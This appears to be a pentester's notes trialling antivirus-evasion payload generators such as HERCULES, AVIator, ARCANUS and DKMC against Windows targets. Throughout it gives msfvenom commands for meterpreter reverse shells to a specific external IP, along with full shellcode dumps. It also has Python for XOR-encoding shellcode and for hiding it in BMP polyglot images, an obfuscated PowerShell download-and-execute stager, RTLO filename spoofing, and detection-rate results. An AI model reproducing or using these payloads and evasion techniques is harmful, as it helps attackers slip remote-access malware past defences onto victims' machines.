0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,
0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,
0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,
0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,
0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,
0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,
0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,
0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,
0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5

First XOR the shellcode with Go; see go-xor-shell for the code. The loader undoes the XOR at run time, so the raw stager bytes never appear in the binary on disk.

Compiled it and ran it, but no shell came back? (failed)
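The XOR step, as an added example in Python rather than the author's Go code (go-xor-shell is not reproduced on this page): it parses the `-f num` text from msfvenom, XORs it with a repeating multi-byte key, checks the round trip and emits Go `[]byte` literals for the loader to embed. The loader then runs the same XOR loop over `encoded` with `key` before copying the result into executable memory. The sample input is the first 24 bytes of the listing above standing in for the full payload, and the key value is an arbitrary choice for the example.

```python
import re

# First 24 bytes of the `-f num` listing above, used as a stand-in for the full
# payload (paste the whole msfvenom output in its place).
NUM_OUTPUT = """
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52
"""

# Arbitrary key for this example; any bytes work as long as none of them is 0x00.
KEY = b"\x5a\xa7\x13"


def parse_num_format(text):
    """Turn msfvenom's `-f num` text (comma-separated 0xNN tokens) into bytes."""
    return bytes(int(tok, 16) for tok in re.findall(r"0x([0-9a-fA-F]{2})", text))


def xor_bytes(data, key):
    """XOR with a repeating multi-byte key. The operation is its own inverse,
    so the loader runs exactly this loop to recover the shellcode at run time."""
    if not key or 0 in key:
        raise ValueError("key must be non-empty and contain no 0x00 (a zero byte leaves input unchanged)")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_go_literal(data, name):
    """Emit bytes as a Go []byte literal, 12 per line, ready to paste into the loader."""
    lines = []
    for i in range(0, len(data), 12):
        lines.append("\t" + ", ".join("0x%02x" % b for b in data[i:i + 12]) + ",")
    return "var %s = []byte{\n%s\n}" % (name, "\n".join(lines))


def encode_for_loader(num_text, key):
    """Full pipeline: parse -> XOR -> Go source for both the blob and the key.
    Returns (plain, encoded, go_source)."""
    plain = parse_num_format(num_text)
    encoded = xor_bytes(plain, key)
    assert xor_bytes(encoded, key) == plain          # round-trip sanity check
    src = to_go_literal(encoded, "encoded") + "\n" + to_go_literal(key, "key")
    return plain, encoded, src


def prologue_visible(blob):
    """True if the untouched x64 msfvenom prologue (cld; and rsp,-16; call) is
    present, i.e. a signature written against the raw stager would still hit."""
    return b"\xfc\x48\x83\xe4\xf0\xe8" in blob


if __name__ == "__main__":
    plain, encoded, src = encode_for_loader(NUM_OUTPUT, KEY)
    print(src)
    print("prologue visible before/after:", prologue_visible(plain), prologue_visible(encoded))
```

The zero-byte check matters: a key byte of 0x00 copies the corresponding input bytes through unchanged, so a single-byte key of 0x00 (or a key that happens to contain one) leaves recognisable fragments of the stager in the binary.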

.cpp shellcode loader (failed)

Generate the shellcode with msfvenom (windows/meterpreter_reverse_tcp is the stageless x86 payload, which is why raw.bin starts with an MZ header, as the hex output shows) and convert it to a \xNN string for embedding in C:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=45.32.137.154 LPORT=3356 > raw.bin

head -c 100 raw.bin | xxd

hexdump -v -e '"\\""x" 1/1 "%02x" ""' raw.bin >> hex_format

head -c 100 hex_format
\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xd6\x42\x00\x00\xff\xd3\x81\xc3\x23\x69

Compile on Kali with mingw (32-bit, matching the x86 payload):

i686-w64-mingw32-c++ sc-launcher.cpp -o sclauncher.exe

C source: see cpp-shellcode

With the shellcode embedded and the binary compiled, it ran but no shell came back.

HERCULES

Install:

Clone from GitHub
https://github.com/EgeBalci/HERCULES

Install the dependency
go get github.com/fatih/color

Run the setup
go run Setup.go

HERCULES/src/EGESPLOIT/RSE/BypassAV.go uses the traditional junk-instruction (花指令) approach for evasion.

Usage

Point-and-click generation.

Detected by Huorong (火绒).

The msf listener on the external host got back a working interactive shell.

VirusTotal 27/71

The source can be adapted and improved as needed.

Evasion is relatively good.

Slackor

Note: "The server was designed to run on Kali Linux. The agent is compiled for Windows, Mac, and Linux, but has primarily been tested with Windows 10"

Installation and deployment

First log in to Slack:

  • A Slack Workspace

  • Register an app (https://api.slack.com/apps) with the following permissions:

channels:read
channels:history
channels:write
files:write:user
files:read

  • Create a bot

Deployed on both the external Kali box and the VM Kali:

go get github.com/Coalfire-Research/Slackor
cd $GOPATH/src/github.com/Coalfire-Research/Slackor
Run install.sh
Run setup.py
Supply the OAuth Access Token and Bot User OAuth Access Token from your app

setup.py errored when the OAuth tokens were entered, so no traffic could be relayed through the Slack server.
The source and the way it works are still worth studying.

ARCANUS

ARCANUS is a customized payload generator/handler

Point-and-click operation

ip: 45.32.137.154
port: 3344

The payload without UPX gets past Huorong

Detection rate: 15/68

With UPX, detection rate: 14/68

Works well, supports many platforms, practical.

TheFatRat

Install

git clone https://github.com/Screetsec/TheFatRat

cd TheFatRat

chmod +x setup.sh && ./setup.sh

Fails to run because of missing components or wrong component versions; it needs an older Kali release.

avoidz

Dependency installation fails on the current Kali.

zirikatu

Just run the sh script directly with ./

Point-and-click operation

windows/x64/meterpreter/reverse_tcp

ip: 45.32.137.154

port: 5566

Detected by Huorong without a packer, and it cannot be packed

Detection rate: 38/67

Evasion is mediocre.

AVIator

Just run the exe.

Generate the most basic shellcode with msf, in C# format since that is what AVIator takes as input:

msfvenom -p windows/meterpreter/reverse_https LHOST=45.32.137.154 LPORT=5566  -f csharp -o test.c

root@kali:~/test# cat test.c 
byte[] buf = new byte[535] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0xe8,0x3e,0x00,
0x00,0x00,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,
0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x37,0x2e,0x30,0x3b,0x20,0x72,
0x76,0x3a,0x31,0x31,0x2e,0x30,0x29,0x20,0x6c,0x69,0x6b,0x65,0x20,0x47,0x65,
0x63,0x6b,0x6f,0x00,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,
0x53,0x53,0x68,0xbe,0x15,0x00,0x00,0xe8,0xfd,0x00,0x00,0x00,0x2f,0x59,0x42,
0x37,0x6d,0x54,0x5f,0x72,0x50,0x5f,0x35,0x36,0x4a,0x44,0x6f,0x67,0x50,0x31,
0x6b,0x48,0x71,0x63,0x77,0x75,0x76,0x42,0x38,0x4f,0x6c,0x4d,0x44,0x48,0x4c,
0x56,0x52,0x31,0x47,0x46,0x34,0x31,0x72,0x77,0x56,0x4e,0x4c,0x39,0x79,0x58,
0x71,0x4c,0x42,0x64,0x67,0x51,0x64,0x38,0x59,0x5f,0x4d,0x4a,0x43,0x4b,0x37,
0x55,0x31,0x39,0x57,0x7a,0x70,0x42,0x61,0x48,0x51,0x6d,0x32,0x39,0x39,0x62,
0x75,0x39,0x76,0x6e,0x55,0x30,0x39,0x44,0x4e,0x47,0x33,0x55,0x70,0x79,0x72,
0x58,0x4f,0x66,0x55,0x33,0x6e,0x53,0x77,0x46,0x49,0x41,0x67,0x6b,0x4f,0x50,
0x74,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,
0x32,0xe8,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,
0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,
0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,
0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x14,0x68,0x88,0x13,0x00,
0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xcd,0xe8,0x4a,0x00,0x00,
0x00,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,
0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,
0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,
0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x6b,0xff,0xff,
0xff,0x34,0x35,0x2e,0x33,0x32,0x2e,0x31,0x33,0x37,0x2e,0x31,0x35,0x34,0x00,
0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };

Thread Hijacking

Paste in the payload; keep the default AES key and IV.

Set the output path.

  • Tick "right to left override (RTLO)" to disguise the file extension.

The shellcode can also be injected into a specific process (works well):

spawn notepad32: flagged by Huorong; session established on the external msf; detection rate 22/68; decent

newthread: flagged by Huorong; session established on the external msf; detection rate 31/68; mediocre

apcalertable: not flagged by Huorong; no session on the external msf

UPX cannot pack the output: ".NET files are not yet supported"

Works, but Huorong detects it.

DKMC (for use inside the LAN)

Install:

$ git clone https://github.com/Mr-Un1k0d3r/DKMC
$ cd DKMC
$ mkdir output

Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final shellcode payload.

Official usage:

1. Generate shellcode (meterpreter / Beacon)
2. Embed the obfuscated shellcode inside the image
3. PowerShell downloads the image and executes it as shellcode
4. Get your shell
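How the image/shellcode polyglot works, as an added Python illustration (not DKMC's own code: DKMC additionally XOR-obfuscates the shellcode behind the key and magic bytes it prints, and rewrites the height field; this example keeps only the header trick). A BMP starts with the two bytes "BM", which decode as harmless 32-bit x86 instructions (42 = inc edx, 4D = dec ebp); the next four bytes hold bfSize, a field viewers generally ignore, so they can be overwritten with E9 plus a rel32 jmp to a payload appended after the pixel data. That is exactly the pattern in the tool's "[+] New BMP header set to 0x424de9..." lines in the output below: 42 4D, then E9 and a little-endian displacement. The 300 x 275 carrier size is the one DKMC reports, the pixel values are constructed, and the 4-byte \x41 payload mirrors the README's test input.

```python
import struct


def build_bmp(width, height, pixel_byte=0x7F):
    """Minimal uncompressed 24-bit BMP built from scratch: 14-byte file header,
    40-byte BITMAPINFOHEADER, then rows padded to 4 bytes. Every pixel is the
    same grey; this is a constructed carrier, not a real picture."""
    stride = (width * 3 + 3) & ~3
    pixels = bytes([pixel_byte]) * (stride * height)
    off_bits = 14 + 40
    file_header = b"BM" + struct.pack("<IHHI", off_bits + len(pixels), 0, 0, off_bits)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                              len(pixels), 2835, 2835, 0, 0)
    return file_header + info_header + pixels


def make_polyglot(bmp, payload):
    """Append the payload after the pixel array and turn bytes 2..6 of the file
    header (bfSize plus one reserved byte, both ignored by viewers) into
    `E9 <rel32>`. Read as 32-bit x86 the file then starts with
    42 4D = inc edx; dec ebp, followed by jmp payload."""
    target = len(bmp)                      # payload sits right after the pixel data
    rel32 = target - (2 + 5)               # jmp encoded at offset 2, 5 bytes long
    patched = bmp[:2] + b"\xE9" + struct.pack("<i", rel32) + bmp[7:]
    return patched + payload


def parse_bmp(data):
    """Read back what an image decoder uses (magic, pixel offset, size, depth)
    and, if the size field was turned into a jmp, resolve where it lands."""
    if data[:2] != b"BM":
        raise ValueError("not a BMP")
    off_bits = struct.unpack_from("<I", data, 10)[0]
    _, width, height, _, bpp = struct.unpack_from("<IiiHH", data, 14)
    stride = (width * bpp // 8 + 3) & ~3
    pixel_end = off_bits + stride * abs(height)
    jmp_target = None
    if data[2] == 0xE9:
        jmp_target = 2 + 5 + struct.unpack_from("<i", data, 3)[0]
    return {"width": width, "height": height, "bpp": bpp,
            "pixel_end": pixel_end, "jmp_target": jmp_target}


def demo():
    """300x275 carrier with the README's 4-byte \\x41 test payload; returns the
    parsed header and the bytes found at the jmp target."""
    carrier = build_bmp(300, 275)
    polyglot = make_polyglot(carrier, b"\x41\x41\x41\x41")
    info = parse_bmp(polyglot)
    return info, polyglot[info["jmp_target"]:]


if __name__ == "__main__":
    info, landed = demo()
    print(info, landed)
```

The image still parses because decoders locate the pixel array through bfOffBits and the info header, not through bfSize; the appended bytes past the pixel array are simply trailing data. The PowerShell stage DKMC generates downloads the file and passes its first byte to a thread start, which is why the jmp has to be at the very front.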
  • Generate shellcode from a raw file
>>> sc
(shellcode)>>> set source shellcode.txt
[+] source value is set.

(shellcode)>>> run
[+] Shellcode:
\x41\x41\x41\x41
  • Generate the obfuscated shellcode embedded inside of an image.
>>> gen
(generate)>>> set shellcode \x41\x41\x41\x41
[+] shellcode value is set.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x1f1dad93
[+] Shellcode size 0x4 (4) bytes
[+] Generating magic bytes 0xa4d0c752
[+] Final shellcode length is 0x57 (87) bytes
[+] New BMP header set to 0x424de9a4c60300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/home/ringzer0/tools/DKMC/output/output-1496175261.bmp)

(generate)>>>
  • Generate PowerShell payload to execute on the victim system.
>>> ps
(powershell)>>> set url http://127.0.0.1:8080/output-1496175261.bmp
[+] url value is set.

(powershell)>>> run
[+] Powershell script:
powershell.exe -nop -w hidden -enc <base64 blob omitted>

(powershell)>>>

Base64-decoded, the script is:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sICFTTLVkC/zE0OTYxNzU0NDQuMjU!tVZrb9pIFP0eKf9hVCHZlowLSbfNRqpUnnm0EIJJ0oSiar!vMGHsMTNjErfNf99rYzdEkGx2tWs+YHvu3LlzzrnH44Iuu1oyT3eED6R8CVIxEZK93Z3dnZK/bH8F5Qs/cPXFPIC7ef+od04+kk/G7s4kDj2dxl725vfXvTb5ubtD8qtHJQ2IWVpS+T0QfszBJtlDJIUHfizBegwuLS4G7c+Y1RzWoqgp!srC0eFhI5YSQr16do5!15SCYMwZKNMiv8jVDCSUz8a34Gnyk5S+O0dcjCnPw5IG9Wa4o1rop2NfhEfTah034kybxrdvhjUsV0dOaxFTrkzDTZSGwPE5NyzyYKULDpIITKPDPCmUmGjnioX7e85FqOgEuphtCR3QM+Erw0rhKvYjQccyzLeV5llFmQbe9nD/Nd+XoHCScxIuxRzMUhhzbpNP5j!voh+HmgW!4xqkiFyQS+aBco5p6HPow2RkduGu2PtrJ5nrkzCqp6VlI0nb6uxkpK2mGtZmpWvMWnhtsIu!PKSY/BbJfLHoR/WlYuFRuEUpjy+Ka5iN!O7F7!nFsiQfScUmHSyKaiETfCwNZ!zWi!xTqoajESlBfC4n86bod4Kpl9RobL82dbXIg1nG4+n07PjHYDYNFq0zHBxeCuaPHlM9IbzUvjm+gLoOuC/bXX40Tic8L+UmTFgIzSSk!fMKtZrbGIUJhww+pwjrYt2mkQ+!3wQOU6pTimwy3JzWCpj+PbceM+6DrHmoCoVVoWCsp8WsWDeNk7!D!SK8ejaQ3Qn2CBTReV8kxerpMwYZDU6Vskkvxib1bOIC5eDbpBYqlg/VYi2yW+Ox3E7MNfOo0kW6kfUCtHkJDREqLWMPdYBwDNwIPEZ5io5NjpkP9cRl06IUYys2Dco5C6eYaYnc4JsUE1en6pJY9aaSLMcFfRJEH!KckLlJm9Mpekfeepk26RR84xU7KJpt1Vkpf!Vua/WjJlwutE0umdToUykVT7X53xVa2NZGvQ0JOclm0dbDeqLTfivFCXB+fnYRXYe3l1edm36Xzga3kU7dfFPQXU!ThXEDPTzUqCZxF3JB/SbV1Hwz0zo6fPu2uvfBqeCvenhQOai8FbGOYl2uvvvzffXDH3vvq844iN5k7Vf6+iNaqL5qidliejo/vb6ezD6Pk5ObtP3+xhQ7VKoZ5cg4ml0hvLaQ7dyveoKlM0yz+LjNQYb!0f7x!1GwUeNceKmFPjE3tPGVuY5Qdhd4u7+39c4ivwOtR4ctXh0e3mDByO5zCDtfIJzqmV25369U0BYr9+8qCMvrN94QUWI+m95OrfZZhF+qi2d1rRha0v597eY6kdDs9i47rVbc9Ob/Oz25YGf457+Wnsd3L4y+irKK/TxsG6FPX/wj/v4NMleUaQx20fc4rHrzZYByqa6d!LZSiiqc5Fd6NDvDju3iSWF3x/iU6uBkQtZQUuwHnstgQQ6s9ZO!0lTq8q0Y42EuSj/QuFYr6p+150etwTKu98+DfqtukZPWV7JthDyQMqJWU/t7eOqT0zg1P/LcGfYXuUMssuV+kT54gKe58qkYZwYH+LFbLy1bcnsijP8LpzV9tEQL!!!=".Replace("!", "A")));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  • Built-in Web Server to deliver the image
>>> web 
(web)>>> set port 8080
[+] port value is set.

(web)>>> run
[+] Starting web server on port 8080

127.0.0.1 - - [30/May/2017 16:18:43] "GET /output-1496175261.bmp HTTP/1.1" 200 -

Detailed walk-through:

Have msf generate the shellcode in raw format, then:

1. Generate the raw file with msf
2. Use sc to convert the raw file into shellcode
3. Use gen to embed that shellcode in a BMP image
4. Use ps to generate the PowerShell payload that fetches and runs the BMP
5. Use web to serve the BMP from the built-in web server

msfvenom -p windows/meterpreter/reverse_https LHOST=45.32.137.154 LPORT=5566 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 -f raw -o dkmctest.raw

Select sc:

(shellcode)>>> set source /root/test/dkmctest.raw

(shellcode)>>> run
[+] Shellcode:
\xdd\xc4\xbb\xa5\x58\x6d\x99\xd9\x74\x24\xf4\x58\x29\xc9\xb1\xba\x83\xe8\xfc\x31\x58\x14\x03\x58\xb1\xba\x98\x24\x87\x82\xb2\x82\x2d\x3e\xed\x59\xf5\x4b\x55\x8b\x3c\x02\xd9\xfa\xd5\x71\x1d\x96\x3d\xf9\xe2\x6c\xe1\xb0\x8a\xf5\xab\x01\x52\xfe\xaa\xde\x02\x27\x5d\xd7\x0c\x3f\x55\x7c\xa8\x50\x5a\xf4\xca\x20\x18\x67\x42\x5a\x1b\xb2\x0f\x29\x1a\x08\xc5\x9d\x4c\x94\xa5\x5e\x3b\x41\x83\xac\x6f\x4c\x1e\x37\xcd\xe1\xfe\xa7\xc6\x78\x16\x0d\xef\xeb\x43\xd9\x37\x8c\xdd\x49\x37\x2f\xdb\x22\x19\x95\x6d\x06\x76\xf9\x23\x50\xdb\x1b\xbd\x90\x57\x47\xc7\xe0\x09\x59\x31\xe3\xd4\xa2\x7b\x3a\xe2\x38\x0a\x91\xb6\xd2\x22\x5f\xa6\xaa\x5e\xfa\x2c\xc3\xf0\x65\x6b\x8c\x59\x13\x04\xce\x19\xea\xae\xc8\xdc\x87\x5b\x83\xfe\x8b\x1d\x99\xae\xd0\xdd\x29\xef\x40\xc4\x34\x01\xb6\x4f\xdf\x51\xf0\x9f\xb5\x0e\x01\x3e\x53\xb0\xe6\x24\x7b\xd4\xcf\x62\x86\xe8\x7c\x54\xcf\xd0\x8f\xbc\x70\xef\xd9\x0b\xb3\x9f\x85\xc1\x3e\x33\xca\x84\xeb\xfa\x55\x05\xfe\x1b\x58\x9a\x0f\xbb\xdc\xdf\x44\xec\x1f\x18\x46\xcd\xd3\x6d\xa5\xc1\x18\x66\x14\xc7\xea\x4a\x9e\x59\x87\x90\xf6\x30\xee\xa3\x0b\x8c\x04\xd9\x03\x6e\xb5\x59\x99\x1b\xdb\xa1\x90\x20\x8c\x3e\x69\xb7\x78\xee\xb8\xb9\x8f\x22\x97\xf5\x07\x37\xca\xb2\x11\xcb\x69\x95\xa6\xd6\x94\x10\x5c\x8e\xaf\xb3\x92\xad\x5b\xc0\x58\xd4\xf0\xdf\xc0\x03\x41\x99\x78\xfc\x4b\x79\xeb\x8c\x8d\x51\x89\x43\x27\xd6\x08\x4f\xb5\x68\x09\xf2\x1a\xd4\xd3\xcc\xfe\xc7\x5d\x75\xdb\xfc\x21\xab\x1f\x4e\xa4\x5b\xfe\x19\x63\x29\x1d\xb7\x8d\x15\x4b\x8e\xbf\xe0\xa1\xfd\xec\x8e\xc3\x43\x90\xf3\x28\x4e\x31\x1e\xfc\x0f\xba\x02\x27\xa3\x29\x7c\xc5\x69\x0e\xe2\x5d\x48\xd3\xd0\xe3\x77\x37\x16\x5d\xcd\x64\x49\x7d\x46\xaa\xcd\xe3\xdb\xa3\x55\xf1\x3b\x45\xcb\xe9\x89\xfa\x09\x6a\xaf\x05\x45\xa5\x8f\x2d\xfb\x88\x0d\x4e\x8e\x59\xdc\xd6\x25\xd9\x6d\x68\xc8\xe6\x79\x14\x8f\x46\x0f\x12\x2e\xa9\xfc\x14\x21\x0e\xdc\x9a\x19\x14\xe7\xe3\xe6\xc7\x42\xa8\xf3\xf1\x8a\x40\xf6\xd2\x78\x5d\xb2\xe5\xaf\x12\x56\xc9\x40\x11\x74\x4b\xc2\x12\x7e\xd4\xde\x8d\x4a\x6f\xc5\x7c\x93\x7b\x4f\x98\xbc\x18\x78\xfa\x7d\x92\x7c\x1c\x7d\x7f\xf8\x21
\x79\xe0\xb8\xf9\x6a\x86\xe0\xcd\x09\xdc\xb5\xe9\xde\x52\x51\xcd\xfe\xbf\x19\xab\x76\x84\xc4\x42\x31\x76\x7b\x29\x7b\x2d\x34\x82\x1f\x0c\xa5\x1c\xa9\xcf\x54\x5a\x3b\x1a\xe2\xd5\x9a\x1e\xe2\x7b\xa3\x39\x64\xff\x78\xc2\x72\x88\x70\xc6\x06\xcd\xa8\xbc\x25\xfe\x56\x81\x75\x05\x8b\x8a\x6f\x16\xe2\xd6\x86\xdb\xf6\x1d\xa0\x31\x25\x55\x66\x25\x87\xa1\xb9\x96\x70\x87\x19\xcb\x69\xf6\x2f\xad\xaa\x4e\x86\x08\x40\xe3\xd8\xc4\x6f\x06\xa0\x01\x16\xfd\x26\x32\x2e\x99\xc2\x9a\xea\x11\x9a\x27\x9d\xea\x9a\x48\x60\x2a\x8a\x82\x3e\xe5\xcd\x93\x2c\x78\x01\x06\x29\x64\x5c\xda\x0c\xea\xd3\xca\xde\x84\xd1\xe1\xd9\x5b\xc3\xf2\x3c\x9a\x7d\x02\x65\xc9\x54\xe5\xbc\x46\x9b\x64\xe3\xd1\x94\x64\xf6\xcf\xf9\xec\x26\xec\xa2\x08\xfe\x2b\x6b\xe6\x87\xc2\xca\xed\x4e\xf0\x17\xf1\xc0\xa6\xea\x95\x1e\xd6\x2f\xce\x9a\x75\x8a\x4b\xb8\x2c\xa3\xec\x13\x68\x2f\xe3\x66\x06\x28\x6b\xdc\x91\x3f\xc7\xbe\x41\xd0\x95\x9a\xae\xd2\x8d\x9a\x9d\xa5\x76\x1d\x37\x69\x29\xa6\x43\x8e\xc8\xc0\xe8\x93\xc2\x51\xec\x62\x8e\x74\xbe\xfe\x2e\xc5\xf2\x4b\xd7\xb2\xdd\xc9\xd1\x07\x34\x05\x8d\x13\x24\x3f\x49\xee\xb0\x78\x5e

exit
gen

(generate)>>> set shellcode \xdd\xc4\xbb\xa5\x58\x6d\x99\xd9\x74\x24\xf4\x58\x29\xc9\xb1\xba\x83\xe8\xfc\x31\x58\x14\x03\x58\xb1\xba\x98\x24\x87\x82\xb2\x82\x2d\x3e\xed\x59\xf5\x4b\x55\x8b\x3c\x02\xd9\xfa\xd5\x71\x1d\x96\x3d\xf9\xe2\x6c\xe1\xb0\x8a\xf5\xab\x01\x52\xfe\xaa\xde\x02\x27\x5d\xd7\x0c\x3f\x55\x7c\xa8\x50\x5a\xf4\xca\x20\x18\x67\x42\x5a\x1b\xb2\x0f\x29\x1a\x08\xc5\x9d\x4c\x94\xa5\x5e\x3b\x41\x83\xac\x6f\x4c\x1e\x37\xcd\xe1\xfe\xa7\xc6\x78\x16\x0d\xef\xeb\x43\xd9\x37\x8c\xdd\x49\x37\x2f\xdb\x22\x19\x95\x6d\x06\x76\xf9\x23\x50\xdb\x1b\xbd\x90\x57\x47\xc7\xe0\x09\x59\x31\xe3\xd4\xa2\x7b\x3a\xe2\x38\x0a\x91\xb6\xd2\x22\x5f\xa6\xaa\x5e\xfa\x2c\xc3\xf0\x65\x6b\x8c\x59\x13\x04\xce\x19\xea\xae\xc8\xdc\x87\x5b\x83\xfe\x8b\x1d\x99\xae\xd0\xdd\x29\xef\x40\xc4\x34\x01\xb6\x4f\xdf\x51\xf0\x9f\xb5\x0e\x01\x3e\x53\xb0\xe6\x24\x7b\xd4\xcf\x62\x86\xe8\x7c\x54\xcf\xd0\x8f\xbc\x70\xef\xd9\x0b\xb3\x9f\x85\xc1\x3e\x33\xca\x84\xeb\xfa\x55\x05\xfe\x1b\x58\x9a\x0f\xbb\xdc\xdf\x44\xec\x1f\x18\x46\xcd\xd3\x6d\xa5\xc1\x18\x66\x14\xc7\xea\x4a\x9e\x59\x87\x90\xf6\x30\xee\xa3\x0b\x8c\x04\xd9\x03\x6e\xb5\x59\x99\x1b\xdb\xa1\x90\x20\x8c\x3e\x69\xb7\x78\xee\xb8\xb9\x8f\x22\x97\xf5\x07\x37\xca\xb2\x11\xcb\x69\x95\xa6\xd6\x94\x10\x5c\x8e\xaf\xb3\x92\xad\x5b\xc0\x58\xd4\xf0\xdf\xc0\x03\x41\x99\x78\xfc\x4b\x79\xeb\x8c\x8d\x51\x89\x43\x27\xd6\x08\x4f\xb5\x68\x09\xf2\x1a\xd4\xd3\xcc\xfe\xc7\x5d\x75\xdb\xfc\x21\xab\x1f\x4e\xa4\x5b\xfe\x19\x63\x29\x1d\xb7\x8d\x15\x4b\x8e\xbf\xe0\xa1\xfd\xec\x8e\xc3\x43\x90\xf3\x28\x4e\x31\x1e\xfc\x0f\xba\x02\x27\xa3\x29\x7c\xc5\x69\x0e\xe2\x5d\x48